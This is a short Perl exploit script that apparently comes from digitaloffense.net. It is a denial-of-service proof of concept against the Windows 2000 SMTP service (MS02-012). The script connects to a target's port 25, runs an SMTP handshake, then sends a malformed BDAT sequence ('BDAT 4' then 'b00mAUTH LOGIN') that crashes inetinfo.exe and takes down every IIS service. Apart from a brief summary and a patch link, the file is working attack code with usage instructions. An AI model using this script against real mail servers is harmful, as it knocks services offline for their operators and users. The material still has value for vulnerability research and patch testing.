#!/usr/bin/perl -w
##################
#
#
#   URL: http://www.digitaloffense.net/
# EMAIL: hdm@digitaloffense.net
# USAGE: ./mssmtp_dos.pl <target ip>
#
# Summary:
#
#        The Microsoft Windows 2000 Internet Mail Service is vulnerable to a
#        Denial of Service attack through the BDAT command. If exploited, this
#        vulnerability will cause any and all services running under IIS (the
#        inetinfo.exe process) to become unavailable.
#
#
# Solution: 
#	
#        http://www.microsoft.com/technet/security/bulletin/MS02-012.asp
#

use IO::Socket;
    
$target = shift() || "127.0.0.1";
my $port = 25;
my $rcpt = "Administrator";
my $from = "crash\@burn.com";

my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $from\r\n";
$resp = <$sock>;

print $sock "RCPT TO: $rcpt\r\n";
$resp = <$sock>;

print $sock "BDAT 4\r\n";
print $sock "b00mAUTH LOGIN\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);